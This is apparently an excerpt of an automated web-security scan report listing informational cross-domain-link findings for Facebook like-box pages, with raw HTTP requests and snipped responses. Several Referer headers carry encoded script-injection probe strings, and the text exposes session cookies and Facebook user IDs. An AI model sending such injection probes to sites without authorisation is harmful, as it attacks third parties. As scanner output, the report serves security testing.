<a href="http://www.facebook.com/profile.php?id=100001826941609" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211295_100001826941609_5954597_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000434735781" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_100000434735781_9787_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

18.219. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=10150135798400694&width=300&connections=20&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/174390_1285609837_6563305_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174535_536112368_7299567_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187085_1323242312_2248005_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203156_100001287394356_7028842_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203398_597032566_122157_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211389_706387512_5005606_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211397_100002491958962_133488_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211678_100000980712336_7850576_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/261043_763593833_6054546_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27521_10150135798400694_9161_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41497_619716046_2751_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

Request

GET /plugins/likebox.php?id=10150135798400694&width=300&connections=20&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

18.220. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39f9869f%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffc67ed3f4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161745_100000201955901_835406_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174825_235165748331_5997043_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186235_500212185_4636006_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186263_1357160939_5222982_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186309_100002298848941_1884031_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186634_1602641763_5849665_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187164_679984335_2736741_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000537581244_4959703_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187590_1418863419_7103130_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195242_100001128097295_1750164_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195562_100001281917469_2391413_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203172_100002225007026_4006895_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211295_100001826941609_5954597_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211329_550120418_6748998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211455_1101949757_7390314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211502_100001334266387_3149516_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211963_1111905101_3802047_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/23224_100000895298739_4226_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260812_100001942484028_8072593_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27413_857950176_61_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41381_100001294358166_9686_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41499_100001419843403_6931_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_100000434735781_9787_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48979_1513838702_5168_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/70687_100000688321355_7190029_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

Request

GET /plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39f9869f%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffc67ed3f4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.61.35
X-Cnection: close
Date: Mon, 13 Jun 2011 11:26:33 GMT
Content-Length: 17619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/tvfanatic" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174825_235165748331_5997043_q.jpg" alt="TV Fanatic" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1101949757" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211455_1101949757_7390314_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186263_1357160939_5222982_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=857950176" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27413_857950176_61_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000201955901" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161745_100000201955901_835406_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001128097295" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195242_100001128097295_1750164_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/brooke.mckeen21" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211329_550120418_6748998_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002298848941" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186309_100002298848941_1884031_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/elvira.quino2" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211502_100001334266387_3149516_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211963_1111905101_3802047_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/SexyCindy69" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70687_100000688321355_7190029_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001419843403" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41499_100001419843403_6931_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001294358166" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41381_100001294358166_9686_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002225007026" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203172_100002225007026_4006895_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1602641763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186634_1602641763_5849665_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000537581244" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000537581244_4959703_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186235_500212185_4636006_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001942484028" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260812_100001942484028_8072593_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1418863419" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187590_1418863419_7103130_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001281917469" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195562_100001281917469_2391413_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001826941609" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211295_100001826941609_5954597_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000434735781" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_100000434735781_9787_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/CherriVonTease" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23224_100000895298739_4226_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187164_679984335_2736741_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1513838702" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48979_1513838702_5168_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

18.221. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161745_100000201955901_835406_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174825_235165748331_5997043_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186235_500212185_4636006_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186263_1357160939_5222982_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186309_100002298848941_1884031_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186634_1602641763_5849665_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187164_679984335_2736741_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000537581244_4959703_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187590_1418863419_7103130_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195242_100001128097295_1750164_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195562_100001281917469_2391413_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203172_100002225007026_4006895_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211295_100001826941609_5954597_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211329_550120418_6748998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211455_1101949757_7390314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211502_100001334266387_3149516_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211963_1111905101_3802047_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/23224_100000895298739_4226_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260812_100001942484028_8072593_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27413_857950176_61_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41381_100001294358166_9686_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41499_100001419843403_6931_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_100000434735781_9787_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48979_1513838702_5168_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/70687_100000688321355_7190029_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

Request

GET /plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.94.39
X-Cnection: close
Date: Mon, 13 Jun 2011 11:33:04 GMT
Content-Length: 17647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/tvfanatic" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174825_235165748331_5997043_q.jpg" alt="TV Fanatic" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1101949757" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211455_1101949757_7390314_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001128097295" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195242_100001128097295_1750164_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186263_1357160939_5222982_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002298848941" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186309_100002298848941_1884031_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/elvira.quino2" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211502_100001334266387_3149516_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=857950176" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27413_857950176_61_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1602641763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186634_1602641763_5849665_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/brooke.mckeen21" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211329_550120418_6748998_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001281917469" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195562_100001281917469_2391413_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1418863419" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187590_1418863419_7103130_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/SexyCindy69" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70687_100000688321355_7190029_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000201955901" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161745_100000201955901_835406_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187164_679984335_2736741_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186235_500212185_4636006_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001942484028" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260812_100001942484028_8072593_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1513838702" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48979_1513838702_5168_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/CherriVonTease" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23224_100000895298739_4226_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000434735781" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_100000434735781_9787_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002225007026" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203172_100002225007026_4006895_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000537581244" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000537581244_4959703_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211963_1111905101_3802047_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001419843403" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41499_100001419843403_6931_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001294358166" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41381_100001294358166_9686_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001826941609" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211295_100001826941609_5954597_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

18.222. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=108254959223467&width=525&connections=20&stream=false&header=false&height=155

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161180_1424363127_6460252_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161187_100001889546696_7413417_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173686_1790585967_6690758_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186211_100001995157834_612714_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186607_1309745445_4037101_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187465_100002518235086_5942544_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195351_1393185790_4706150_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195490_100001037892679_5713005_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202863_902160494_362800_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203050_508087898_4232854_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260945_1651976342_4097640_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260986_552453252_5344107_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27421_100000532061024_7084_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41643_1423332305_1556_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41790_108254959223467_1942_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/70774_100000591402725_3978992_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/70843_100001771002242_4286354_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css
